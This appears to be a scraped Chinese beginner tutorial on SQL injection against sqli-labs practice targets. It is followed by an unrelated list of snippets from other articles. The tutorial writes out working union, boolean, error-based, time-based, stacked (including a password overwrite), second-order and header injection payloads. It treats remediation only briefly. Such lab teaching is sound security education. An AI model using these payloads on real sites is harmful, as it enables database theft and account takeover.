Plkaciu
Plkaciu

SQL注入-入门

一、漏洞原理

简单的来说就是开发在写网站的有些功能需要从数据库查询和写入、删除等对数据库的操作,例如网站显示文章、或者网站后台查询用户信息、上传文件、删除用户、评论区等。只要是数据库有交互的地方都有可能产生SQL注入。

例如下面的是向数据库查询信息的php代码

$sql = "select * from user where id = $_GET['id']";

这里我们只需要get传参id就可以查询数据库信息,而且这个语句是没有做任何过滤我们只需要用 ' 符号过滤掉。

二、数据库语句

我们需要先了解数据库的结构,数据库结构是由数据库-表-字段-值组成。

SQL注入-入门_第1张图片

我们一般查询先从数据库名-查表明-查字段名-查值

查看数据命令:show databasesl;

SQL注入-入门_第2张图片

如果我们要查看数据库里面的表明我们需要先使用要查询的数据库

user blog;
show tables;

SQL注入-入门_第3张图片

查询表里面的字段值命令:select * from admin;

SQL注入-入门_第4张图片

limit查询

select * from admin limit 0,1;

SQL注入-入门_第5张图片

有一个常用的数据库

informtion_schema数据库,里面有三个经常用到的表名:schemata(所有数据库名)、tables(所有数据库,表)、columns(所有数据库,表,字段)

SQL注入-入门_第6张图片

SQL注入-入门_第7张图片

SQL注入-入门_第8张图片

SQL注入-入门_第9张图片

常用的函数

database();查看数据库
user();Mysql用户
version();mysql版本号

三、注入类型

注入类型有非常多,但是实际上遇到不多,就演示常见的几个类型首先我们要了解一下GET和POST两种注入方式,GET是在url上面提交参数,而POST是在表单提交数据。可以用sqli-labs靶场这几种环境都有

1. Union注入(联合注入)

就是利用union函数联合查询。

使用) --+符号进行闭合

SQL注入-入门_第10张图片

order by字段数为6,7的话报错就为6

SQL注入-入门_第11张图片

然后使用union查询

SQL注入-入门_第12张图片

数据库查询

http://172.16.234.196/new.php?id=1) union select 1,2,3,database(),5,6 --+

SQL注入-入门_第13张图片

查询数据库

SQL注入-入门_第14张图片

查询表

SQL注入-入门_第15张图片

查询字段

1) union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema='demo05' and table_name='admin'-- +

SQL注入-入门_第16张图片

查询值

SQL注入-入门_第17张图片

2. Boolean注入(布尔注入)

查看返回对和错,True false,利用length猜长度,因为这个很麻烦还要对照ASCII表,基本都使用工具或者脚本,所以我在这里就简单的演示一下

猜测数据库长度大于5

SQL注入-入门_第18张图片

小于10

SQL注入-入门_第19张图片

长度为8

SQL注入-入门_第20张图片

猜测库名,第一个字母为115对应ASCII码为s

SQL注入-入门_第21张图片

最后数据库为security

参考

猜表的个数
localhost/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
猜第一个表的长度

localhost/sqli-labs-master/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

猜第二个表的长度

localhost/sqli-labs-master/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))<6 --+

猜第一个表名的第一个字符的ascii码

localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))<100 --+

 猜第一个表名的第二个字符的ascii码

localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables limit 0,1),2,1))<100 --+

通过以上尝试,可以猜出存在users表

猜users表中列的个数

localhost/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name="users")>5 --+

猜users表中第一列的长度

localhost/sqli-labs-master/Less-8/?id=1' and length((select column_name from information_schema.columns where table_name="users" limit 0,1)) >5 --+

猜第一列的第一个值的ascii

localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)) >100 --+

由此可以猜出存在字段username

猜username的数据个数

localhost/sqli-labs-master/Less-8/?id=1' and (select count(username) from users ) >20 --+

猜第一个数据的长度

localhost/sqli-labs-master/Less-8/?id=1' and length((select username from users limit 0,1))=4 --+

猜第一个数据的第一位的ascii

localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))>100 --+

由此可以猜出全部数据

3. 报错注入

MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。使用函数updatexml()

参考

?id=1' and updatexml(1, 0x7e, 3) -- a

SQL注入-入门_第22张图片

4. 延时注入

这个也是看对和错只不过是通过返回时间来判断,通过sleep函数

判断延时注入?id=1' and sleep(100) --+

SQL注入-入门_第23张图片

猜库长

SQL注入-入门_第24张图片

3、爆库名
从左边第一个字母开始,判断库名第一个字母是不是s
?id=1' and if(left(database(),1)='s',sleep(5),null)--+
?id=1' and if(left(database(),2)='se',sleep(5),null)--+
4、爆表名
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' ,sleep(5),null)--+
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em' ,sleep(5),null)--+
5、爆列名
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit ,1),)='password' ,sleep(5),null)--+

这种基本都是用脚本或工具跑的

5. 堆叠注入

就是在查询语句后面再写一个查询语句。

SQL注入-入门_第25张图片

更改密码http://127.0.0.1/Less-38/?id=1%27;update%20users%20set%20password=%27123456%27%20where%20id=1;%20--+

SQL注入-入门_第26张图片

SQL注入-入门_第27张图片

堆叠注入和union注入差不多只不过堆叠注入可以执行的命令更多。

6. 二次注入

比如我们在注册用户或者提交某种信息的时候写入查询语句,他会储存到数据库,当我们访问某一个能触发刚刚存储到数据库是sql语句时就能返回查询信息

这是一个登录框,点击注册跳转注册页面

SQL注入-入门_第28张图片

账号输入sql万能账号语句

SQL注入-入门_第29张图片

它会存储到数据库中

SQL注入-入门_第30张图片

使用刚刚注册的账号密码登录成功

SQL注入-入门_第31张图片

更改密码,成功替换掉admin用户密码

SQL注入-入门_第32张图片

SQL注入-入门_第33张图片

7. 请求头注入

简单来说就是有些网站会把cookie值记录到数据库,或者记录用户的IP、用户的浏览器访问信息等,这样就会带来sql注入的危险。

SQL注入-入门_第34张图片

在content-Type钩爪sql语句' and updatexml(1,concat("~",database(),"~"),1),'','')-- clay

SQL注入-入门_第35张图片

SQL注入-入门_第36张图片

四、漏洞修复

利用别人写好的过滤规则,上waf。

你可能感兴趣的:(#,WEB攻防,sql,数据库,web安全)

  • 利用VBA+SQL查询Excel工作表数据(模糊查询) VBAMatrix VBA代码sqlexcel数据库
    续前2篇:1.利用VBA+SQL查询Excel工作表数据(基本查询)2.利用VBA+SQL查询Excel工作表数据(条件查询)本文将继续使用VBA+SQL查询的模板,并详细介绍SQL模糊查询语句在VBA中的使用。VBA+SQL查询的模板题[员工花名册$A1:I65536]SQL模糊查询的关键词是like、notlike,通常结合通配符使用,从而实现模糊查询的功能。通配符见下表:通配符含义%匹配一个
  • mybatis-plus逆向code generator pgsql实践 松树戈 工具使用mybatisspringboot
    mybatis-plus逆向codegeneratorpgsql实践环境准备重要工具的版本供参考pom依赖待逆向的SQL配置文件CodeGenerator配置类配置类说明环境准备重要工具的版本jdk1.8.0_131springboot2.7.6mybatis-plus3.5.7pgsql14.15供参考pom依赖4.0.0com.tghparent-demo0.0.1-SNAPSHOTparen
  • docker 安装mysql hunter199010 docker容器运维
    1、下载镜像我这里下载的是mysql5.7.82、创建MySQL专用目录mkdir/data/mysql1cd/data/mysql1mkdirconfmkdirdatamkdirlog下面这个是我的启动命令sudodockerrun-d-p3306:3306--restart=always-v/data/mysql1/log:/var/log/mysql-v/data/mysql1/data:/
  • python如何将数据生成excel_Python如何将数据导出excel的技巧分享 weixin_39528697
    本篇文章主要介绍了python技能之导出excel的实例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧本文介绍了python技能之导出excel的实例代码,正好能用到,写出来分享给大家作为一个数据分析师,下面的需求是经常会遇到的。从数据库或者现有的文本文件中提取符合要求的数据,做一个二次处理,处理完成后的数据最终存储到excel表格中供其他部门的人继续二次分析。在
  • 使用 MySQL 从 JSON 字符串提取数据 m0_66323401 面试学习路线阿里巴巴mysqljsonoracle
    使用MySQL从JSON字符串提取数据在现代数据库管理中,JSON格式因其灵活性而广泛使用。然而,当数据存储在JSON中时,我们经常需要将其转换为更易于处理的格式。本篇文章将通过一个具体的SQL查询示例,展示如何从存储在MySQL中的JSON字符串提取数据并重新格式化。1.背景知识JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器
  • 中国第一本介绍企业级开发工具Zend的书籍 weixin_34245749 开发工具数据库javascriptViewUI
    【书名】大道PHP:LAMP+Zend+开源框架整合开发与实战【作者】三扬科技【ISBN】978-7-121-09171-1【出版社】电子工业出版社【出版日期】2009年9月【定价】99.00元(含视频DVD1张)【宣传语】第一本介绍企业级开发工具Zend的书籍最完整的PHP5开发技术与实战代码万用大全基于Linux+Apache+MySQL+PHP黄金组合,Socket、WebService、A
  • MyBatis 源码解析:动态 SQL 生成的基本原理 捕风捉你 MyBatis源码解读mybatistomcat
    摘要MyBatis提供了灵活的动态SQL功能,使得开发者可以根据业务需求在运行时生成不同的SQL语句。动态SQL是MyBatis最具特色的功能之一,它允许我们通过条件拼接来生成复杂的查询语句。本文将通过自定义实现一个简化的动态SQL生成器,解析其工作原理,并结合MyBatis的源码进行深入讲解。前言传统的SQL查询往往需要开发者根据不同的业务逻辑手动拼接SQL语句,而这种方式不仅容易出错,也不够灵
  • MySQL中update语法的使用(超详细) AI_茗 mysql数据库
    在MySQL中,UPDATE语句用于修改已存在的表中的记录。以下是对UPDATE语句的详细解释和使用方法:语法UPDATEtable_nameSETcolumn1=value1,column2=value2,...WHEREcondition;table_name:要更新的表名。SET:用于指定要更新的列和新的值。column1,column2,...:要更新的列名。value1,value2,.
  • 实验报告一:IT项目与技术实践 朱佳顺
    本文还有配套的精品资源,点击获取简介:实验报告是记录科学和技术实验过程、结果与分析的重要文件。本报告"01-实验报告一.zip"为系列报告中的第一份,包含实验目的、方法、数据、观察和结论。它可能涉及文件压缩、实验设计、数据处理和可视化、以及科学报告撰写等关键技能。实验内容可能包括编程、网络、数据库和软件开发等领域,要求学生了解实验流程,掌握数据分析方法,以及学术写作规范。1.文件压缩与ZIP格式使
  • Java面试八股文:Memcached面试题专场(持续更新中......) Java凤梨 Java金三银四面试题memcachedjava面试
    全套Java金三银四面试题持续更新可文末自取,建议关注收藏不然下次找不到哟~目录1、Memcached是什么,有什么作用?memcached服务在企业集群架构中有哪些应用场景?一、作为数据库的前端缓存应用二、作业集群的session会话共享存储。2、Memcached服务分布式集群如何实现?3、Memcached服务特点及工作原理是什么?4、简述Memcached内存管理机制原理?SlabAllo
  • redis 使用 m0_74825634 面试学习路线阿里巴巴redis数据库缓存
    文章目录补充说明语法选项参数实例连接服务端添加数据查询数据删除数据补充说明yum安装的redis.conf在/etc/redis/redis.conf语法redis-cli(选项)(参数)选项-a输入密码-n选择数据库若无此参数默认选中0数据库参数set添加数据keys用于查询此参数后可输入正则查询|keys"*"del删除数据实例连接服务端无密码链接:redis-cli有密码链接:redis-c
  • 算法练习|Leetcode49字母异位词分词 ,Leetcode128最长连续序列,Leetcode3无重复字符的最长子串,sql总结 ambitious_Rgr 算法sql哈希哈希算法数据结构leetcodepython
    目录一、Leetcode49字母异位词分词题目描述解题思路方法:哈希总结二、Leetcode128最长连续序列题目描述解题思路方法:总结三、Leetcode3无重复字符的最长子串题目描述解题思路方法:双指针法总结sql总结一、Leetcode49字母异位词分词题目描述给你一个字符串数组,请你将字母异位词组合在一起。可以按任意顺序返回结果列表。字母异位词是由重新排列源单词的所有字母得到的一个新单词。
  • Python图形界面 Tkinter入门6 数据库sqlite3 mango大侠 Pythonpython数据库sqlite3tkinter
    6.1数据库sqlite3基础fromtkinterimport*importsqlite3importosroot=Tk()root.title('数据库sqlite3操作')root.geometry('400x400')#sqlite3-------------------------------------------------##检查数据库文件是否存在,不存在就创建,user表:ifn
  • Mongodb主从模式最佳方案 Christian Bai mongodb数据库
    我整理的一些关于【Java】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://d.51cto.com/bLN8S1MongoDB主从模式最佳方案MongoDB是一款开源的文档型数据库,被广泛应用于许多现代应用中。其强大的性能和灵活的数据结构使得它特别适合处理大数据和高并发访问。本文将介绍MongoDB的主从模式,并提供最佳方案和示例代码,帮助你更好地理解这种模式的运作原理。什么
  • 关于django __str__ 与 __unicode__ 问题 weixin_40105587 python
    因为所有字符串都作为Unicode字符串从数据库返回,基于字符的模型字段(CharField、TextField、URLField等)在Django从数据库检索数据时将包含Unicode值。即使数据可以放入ASCII字节字符串,也总是如此。您可以在创建模型或填充字段时传入bytestring,并且Django会在需要时将其转换为Unicode。¶选择__str__()和__unicode__()请
  • go hive skynet_MMORPG游戏服务器技术选型参考-Go语言中文社区 weixin_39908948 gohiveskynet
    游戏服务器一般追求稳定和效率,所以偏向于保守,使用的技术手段也是以已经过验证、开发人员最熟悉、能HOLD为主要前提。1、典型按场景分服设计开发语言:c++数据库:mysql架构:多个网关:维持与玩家间的SOCKET连接,可处理广播、断线重连等逻辑。一个或多个账号登陆验证服务器:处理登陆、排队等逻辑。多个场景服务器:处理在本地图上能解决的逻辑,如:打怪、玩家间战斗、接任务、完成任务等各种不需要跨地图
  • flask实现mysql连接池_如何在python flask中使用mysql.connection数据库池 weixin_39710396 flask实现mysql连接池
    Traceback(mostrecentcalllast):File"/home/myuser/virtualenv/py2.7-myapp-server-logger/lib/python2.7/site-packages/flask/app.py",line1836,in__call__returnself.wsgi_app(environ,start_response)File"/home/
  • 微服务es搜索关键词,实现关键词高亮,来自黑马头条的总结 菜鸡且互啄69 elasticsearch大数据搜索引擎java
    为了加快搜索效率从es数据库中查询实现的效果,要求从标题和内容中搜索关键词,然后让关键词高亮步骤ElasticSearch环境搭建索引库创建文章搜索多条件复合查询索引数据同步ElasticSearch环境搭建这些都是死步骤,直接cvik分词器下载地址:https://github.com/medcl/elasticsearch-analysis-ik下载完后,解压安装包到ElasticSearch
  • python flask django在线投票系统 md14i 专注分享bishe530 pythonflaskdjango
    文章目录具体实现截图项目技术介绍论文写作思路核心代码部分展示可定制开发功能创新亮点django项目示例源码/演示视频获取方式具体实现截图项目技术介绍Python版本:python3.7以上框架支持:flask/django开发软件:PyCharm数据库:mysql数据库工具:Navicat浏览器:谷歌浏览器(PycharmFlaskDjangoVuemysql)论文写作思路第一部分绪论,主要介绍所
  • mysql表误删回复_恢复mysql数据库误删数据 weixin_39655689 mysql表误删回复
    前言某一天,天朗气清;突然传来消息:数据库被删库了!这简直不亚于8级大地震呀;一找原因,服务器宕机造成了数据库数据丢失。于是,通过日志恢复数据的救援开始了。正文在数据库开启binlog功能找到/etc/my.cnf并编辑(没有my.cnf的时候就找my.ini);添加log-bin=mysql-binexpire_logs_days=7(日志保留天数)然后重启mysql注意:log_bin是生成的
  • mysql数据误删恢复_MySQL数据库误删除后如何恢复? 啟潍 mysql数据误删恢复
    原标题:MySQL数据库误删除后如何恢复?在日常运维工作中,对于数据库的备份是至关重要的!数据库对于网站的重要性使得我们对MySQL数据库的管理不容有失!然而是人总难免会犯错误,说不定哪天大脑短路了,误操作把数据库给删除了,怎么办?下面,就MySQL数据库误删除后的恢复方案进行说明。一、工作场景(1)MySQL数据库每晚12:00自动完全备份。(2)某天早上上班,9点的时候,一同事犯晕drop了一
  • 中科院空天院的面试题总结-Java web18285997089 面试学习路线阿里巴巴java开发语言
    JAVA1.谈谈ajax的异步请求,与同步请求的区别答:同步是指:发送方发出数据后,等接收方发回响应以后才发下一个数据包的通讯方式。异步是指:发送方发出数据后,不等接收方发回响应,接着发送下个数据包的通讯方式。自己说了一堆,面试官直接这两句回我,简洁明了,这就是功力,惭愧2.数据库中有成绩字段,给出查询排名前10的语句答:select*from(select*from表orderby成绩desc)
  • mysql md5()函数重复_如何处理MySQL函数MD5的输入? 萝卜鱼丸烧 mysqlmd5()函数重复
    我在理解如何处理MySQL4.1.22中MD5函数的输入时遇到了一些问题。基本上,我无法重新创建特定值组合的MD5sum进行比较。我想这和输入数据的格式有关。我已经建立了一个表,其中有两列类型为double(方向和高度)+第三列,用于存储MD5和。使用安装脚本,我将数据添加到方向和高程字段+使用以下语法创建校验和:insertintopolygons(direction,elevation,md5
  • C#多线程异步连接MySQL与SQLserver数据库 weixin_46846685 WPFMySQL数据库c#mysqlsqlserverwpf异步Tuple
    C#多线程异步连接MySQL与SQLserver数据库一、前言二、多线程异步连接数据库代码2.1代码块2.2代码说明参考文档一、前言当编写代码连接多台设备上的数据库时,如果采用同步逐个连接的方式,在网络畅通的情况下连接速度尚可,但当其中一台设备网络不佳特别是处于关机状态时,等待数据库连接同时程序无法响应的时间会大幅度增加,即使设置ConnectTimeout也无法缩短等待时间,因为此时是程序在等待
  • 阿里云MWC 2019发布7款重磅产品,助力全球企业迈向智能化 数据库技术分享者 大数据数据库人工智能
    当地时间2月25日,在巴塞罗那举行的MWC2019上,阿里云面向全球发布了7款重磅产品,涵盖无服务器计算、高性能存储、全球网络、企业级数据库、大数据计算等主要云产品,可满足电子商务、物流、金融科技以及制造等各行业企业的数字化转型需求,助力全球企业迈向智能化。在大会期间,阿里云还携手德勤、RedHat以及VMware等合作伙伴展示了从基础设施到企业级应用的智能化解决方案。阿里云在MWC2019上展示
  • Qt学习1 qq_43361844 QTqt学习开发语言
    QUuidQUuid是Qt库中的一个类,用于生成、表示和操作UUID(通用唯一标识符,UniversallyUniqueIdentifier)。UUID是一种广泛使用的标识符,通常用来唯一地标识对象、记录、会话、文件、实体等。QUuid类简介QUuid类提供了一个简单的接口,用于创建、解析和操作UUID。UUID在很多应用场景中都有广泛使用,比如在数据库中作为主键、在分布式系统中唯一标识设备和实体
  • MySQL数据库三:操作数据库(二) 嘵奇 MySQL数据库mysql
    DQL查询数据(重点)DataQueryLanguage:数据查询语言●所有的查询操作都用它Select●简单的查询,复杂的查询它都能做●数据库中最核心的语言,最重要的语句●使用频率最高的语句基本查询代码演示:--简单查询语句SELECT*FROM`class`--查询表的全部信息SELECT`id`,`name`FROM`class`--查询表的指定信息SELECT`id`AS学号,`name`
  • SQLMesh系列教程-3:SQLMesh模型属性详解 梦想画家 数据分析工程#python数据工程分析工程
    SQLMesh的MODEL提供了丰富的属性,用于定义模型的行为、存储、调度、依赖关系等。通过合理配置这些属性,可以构建高效、可维护的数据管道。在SQLMesh中,MODEL是定义数据模型的核心结构,初学SQLMesh,定义模型看到属性会很迷惑,本文主要解释sqlmesh的模型属性,为后续继续学习打基础。模型属性在SQLMesh中,MODEL是定义数据模型的核心结构,除了kind属性外,还有许多其他
  • SQLMesh 系列教程4- 详解模型特点及模型类型 梦想画家 数据分析工程数据工程sqlmesh
    SQLMesh作为一款强大的数据建模工具,以其灵活的模型设计和高效的增量处理能力脱颖而出。本文将详细介绍SQLMesh模型的特点和类型,帮助读者快速了解其强大功能。我们将深入探讨不同模型类型(如增量模型、全量模型、SCDType2等)的适用场景和优势,并通过实际示例展示如何利用这些模型高效加载数据。无论你是数据工程师还是数据科学家,SQLMesh都能为你提供强大的支持。让我们一起探索SQLMesh
  • 人工智能推理模型(S1-32B)超越DeepSeek? deepdata_cn 垂域模型人工智能人工智能大语言模型
    S1模型是由斯坦福大学和华盛顿大学的研究团队在李飞飞教授的领衔下开发的人工智能推理模型。从2000年李飞飞进入加州理工学院攻读研究生起,就一直从事人工智能研究,在计算机视觉领域创立了拥有1500万张图片的ImageNet数据库,为人工智能计算机视觉研究奠定了基础,也积累了深厚的人工智能技术理论和实践经验。论文地址:https://arxiv.org/pdf/2501.19393一、发展过程模型采用
  • 算法 单链的创建与删除 换个号韩国红果果 c算法
    先创建结构体 struct student { int data; //int tag;//标记这是第几个 struct student *next; }; // addone 用于将一个数插入已从小到大排好序的链中 struct student *addone(struct student *h,int x){ if(h==NULL) //??????
  • 《大型网站系统与Java中间件实践》第2章读后感 白糖_ java中间件
           断断续续花了两天时间试读了《大型网站系统与Java中间件实践》的第2章,这章总述了从一个小型单机构建的网站发展到大型网站的演化过程---整个过程会遇到很多困难,但每一个屏障都会有解决方案,最终就是依靠这些个解决方案汇聚到一起组成了一个健壮稳定高效的大型系统。          看完整章内容,
  • zeus持久层spring事务单元测试 deng520159 javaDAOspringjdbc
    今天把zeus事务单元测试放出来,让大家指出他的毛病, 1.ZeusTransactionTest.java 单元测试   package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Test; import
  • Rss 订阅 开发 周凡杨 htmlxml订阅rss规范
                    RSS是 Really Simple Syndication的缩写(对rss2.0而言,是这三个词的缩写,对rss1.0而言则是RDF Site Summary的缩写,1.0与2.0走的是两个体系)。   RSS
  • 分页查询实现 g21121 分页查询
    在查询列表时我们常常会用到分页,分页的好处就是减少数据交换,每次查询一定数量减少数据库压力等等。 按实现形式分前台分页和服务器分页: 前台分页就是一次查询出所有记录,在页面中用js进行虚拟分页,这种形式在数据量较小时优势比较明显,一次加载就不必再访问服务器了,但当数据量较大时会对页面造成压力,传输速度也会大幅下降。 服务器分页就是每次请求相同数量记录,按一定规则排序,每次取一定序号直接的数据
  • spring jms异步消息处理 510888780 jms
    spring JMS对于异步消息处理基本上只需配置下就能进行高效的处理。其核心就是消息侦听器容器,常用的类就是DefaultMessageListenerContainer。该容器可配置侦听器的并发数量,以及配合MessageListenerAdapter使用消息驱动POJO进行消息处理。且消息驱动POJO是放入TaskExecutor中进行处理,进一步提高性能,减少侦听器的阻塞。具体配置如下:
  • highCharts柱状图 布衣凌宇 hightCharts柱图
    第一步:导入 exporting.js,grid.js,highcharts.js;第二步:写controller   @Controller@RequestMapping(value="${adminPath}/statistick")public class StatistickController {  private UserServi
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans springmvcSpring 教程spring3 教程Spring 入门
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • TLS java简单实现 antlove javasslkeystoretlssecure
      1. SSLServer.java package ssl; import java.io.FileInputStream; import java.io.InputStream; import java.net.ServerSocket; import java.net.Socket; import java.security.KeyStore; import
  • Zip解压压缩文件 百合不是茶 Zip格式解压Zip流的使用文件解压
       ZIP文件的解压缩实质上就是从输入流中读取数据。Java.util.zip包提供了类ZipInputStream来读取ZIP文件,下面的代码段创建了一个输入流来读取ZIP格式的文件; ZipInputStream in = new ZipInputStream(new FileInputStream(zipFileName));     &n
  • underscore.js 学习(一) bijian1013 JavaScriptunderscore
            工作中需要用到underscore.js,发现这是一个包括了很多基本功能函数的js库,里面有很多实用的函数。而且它没有扩展 javascript的原生对象。主要涉及对Collection、Object、Array、Function的操作。       学
  • java jvm常用命令工具——jstatd命令(Java Statistics Monitoring Daemon) bijian1013 javajvmjstatd
    1.介绍         jstatd是一个基于RMI(Remove Method Invocation)的服务程序,它用于监控基于HotSpot的JVM中资源的创建及销毁,并且提供了一个远程接口允许远程的监控工具连接到本地的JVM执行命令。         jstatd是基于RMI的,所以在运行jstatd的服务
  • 【Spring框架三】Spring常用注解之Transactional bit1129 transactional
    Spring可以通过注解@Transactional来为业务逻辑层的方法(调用DAO完成持久化动作)添加事务能力,如下是@Transactional注解的定义:   /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version
  • 我(程序员)的前进方向 bitray 程序员
    作为一个普通的程序员,我一直游走在java语言中,java也确实让我有了很多的体会.不过随着学习的深入,java语言的新技术产生的越来越多,从最初期的javase,我逐渐开始转变到ssh,ssi,这种主流的码农,.过了几天为了解决新问题,webservice的大旗也被我祭出来了,又过了些日子jms架构的activemq也开始必须学习了.再后来开始了一系列技术学习,osgi,restful.....
  • nginx lua开发经验总结 ronin47
    使用nginx lua已经两三个月了,项目接开发完毕了,这几天准备上线并且跟高德地图对接。回顾下来lua在项目中占得必中还是比较大的,跟PHP的占比差不多持平了,因此在开发中遇到一些问题备忘一下 1:content_by_lua中代码容量有限制,一般不要写太多代码,正常编写代码一般在100行左右(具体容量没有细心测哈哈,在4kb左右),如果超出了则重启nginx的时候会报 too long pa
  • java-66-用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。颠倒之后的栈为{5,4,3,2,1},5处在栈顶 bylijinnan java
    import java.util.Stack; public class ReverseStackRecursive { /** * Q 66.颠倒栈。 * 题目:用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。 * 颠倒之后的栈为{5,4,3,2,1},5处在栈顶。 *1. Pop the top element *2. Revers
  • 正确理解Linux内存占用过高的问题 cfyme linux
    Linux开机后,使用top命令查看,4G物理内存发现已使用的多大3.2G,占用率高达80%以上: Mem:   3889836k total,  3341868k used,   547968k free,   286044k buffers Swap:  6127608k total,&nb
  • [JWFD开源工作流]当前流程引擎设计的一个急需解决的问题 comsci 工作流
         当我们的流程引擎进入IRC阶段的时候,当循环反馈模型出现之后,每次循环都会导致一大堆节点内存数据残留在系统内存中,循环的次数越多,这些残留数据将导致系统内存溢出,并使得引擎崩溃。。。。。。       而解决办法就是利用汇编语言或者其它系统编程语言,在引擎运行时,把这些残留数据清除掉。
  • 自定义类的equals函数 dai_lm equals
    仅作笔记使用 public class VectorQueue { private final Vector<VectorItem> queue; private class VectorItem { private final Object item; private final int quantity; public VectorI
  • Linux下安装R语言 datageek R语言 linux
    命令如下:sudo gedit  /etc/apt/sources.list1、deb http://mirrors.ustc.edu.cn/CRAN/bin/linux/ubuntu/ precise/ 2、deb http://dk.archive.ubuntu.com/ubuntu hardy universesudo apt-key adv --keyserver ke
  • 如何修改mysql 并发数(连接数)最大值 dcj3sjt126com mysql
    MySQL的连接数最大值跟MySQL没关系,主要看系统和业务逻辑了   方法一:进入MYSQL安装目录 打开MYSQL配置文件 my.ini 或 my.cnf查找 max_connections=100 修改为 max_connections=1000 服务里重起MYSQL即可   方法二:MySQL的最大连接数默认是100客户端登录:mysql -uusername -ppass
  • 单一功能原则 dcj3sjt126com 面向对象的程序设计软件设计编程原则
    单一功能原则[ 编辑]     SOLID 原则 单一功能原则 开闭原则 Liskov代换原则 接口隔离原则 依赖反转原则 查   论   编 在面向对象编程领域中,单一功能原则(Single responsibility principle)规定每个类都应该有
  • POJO、VO和JavaBean区别和联系 fanmingxing VOPOJOjavabean
    POJO和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Plain Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比POJO复杂很多,JavaBean是一种组件技术,就好像你做了一个扳子,而这个扳子会在很多地方被
  • SpringSecurity3.X--LDAP:AD配置 hanqunfeng SpringSecurity
    前面介绍过基于本地数据库验证的方式,参考http://hanqunfeng.iteye.com/blog/1155226,这里说一下如何修改为使用AD进行身份验证【只对用户名和密码进行验证,权限依旧存储在本地数据库中】。   将配置文件中的如下部分删除: <!-- 认证管理器,使用自定义的UserDetailsService,并对密码采用md5加密-->
  • mac mysql 修改密码 IXHONG mysql
    $ sudo /usr/local/mysql/bin/mysqld_safe –user=root & //启动MySQL(也可以通过偏好设置面板来启动)$ sudo /usr/local/mysql/bin/mysqladmin -uroot password yourpassword //设置MySQL密码(注意,这是第一次MySQL密码为空的时候的设置命令,如果是修改密码,还需在-
  • 设计模式--抽象工厂模式 kerryg 设计模式
    抽象工厂模式:     工厂模式有一个问题就是,类的创建依赖于工厂类,也就是说,如果想要拓展程序,必须对工厂类进行修改,这违背了闭包原则。我们采用抽象工厂模式,创建多个工厂类,这样一旦需要增加新的功能,直接增加新的工厂类就可以了,不需要修改之前的代码。     总结:这个模式的好处就是,如果想增加一个功能,就需要做一个实现类,
  • 评"高中女生军训期跳楼” nannan408
       首先,先抛出我的观点,各位看官少点砖头。那就是,中国的差异化教育必须做起来。    孔圣人有云:有教无类。不同类型的人,都应该有对应的教育方法。目前中国的一体化教育,不知道已经扼杀了多少创造性人才。我们出不了爱迪生,出不了爱因斯坦,很大原因,是我们的培养思路错了,我们是第一要“顺从”。如果不顺从,我们的学校,就会用各种方法,罚站,罚写作业,各种罚。军
  • scala如何读取和写入文件内容? qindongliang1922 javajvmscala
    直接看如下代码: package file import java.io.RandomAccessFile import java.nio.charset.Charset import scala.io.Source import scala.reflect.io.{File, Path} /** * Created by qindongliang on 2015/
  • C语言算法之百元买百鸡 qiufeihu c算法
    中国古代数学家张丘建在他的《算经》中提出了一个著名的“百钱买百鸡问题”,鸡翁一,值钱五,鸡母一,值钱三,鸡雏三,值钱一,百钱买百鸡,问翁,母,雏各几何? 代码如下: #include <stdio.h> int main() { int cock,hen,chick; /*定义变量为基本整型*/ for(coc
  • Hadoop集群安全性:Hadoop中Namenode单点故障的解决方案及详细介绍AvatarNode wyz2009107220 NameNode
    正如大家所知,NameNode在Hadoop系统中存在单点故障问题,这个对于标榜高可用性的Hadoop来说一直是个软肋。本文讨论一下为了解决这个问题而存在的几个solution。 1. Secondary NameNode 原理:Secondary NN会定期的从NN中读取editlog,与自己存储的Image进行合并形成新的metadata image 优点:Hadoop较早的版本都自带,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他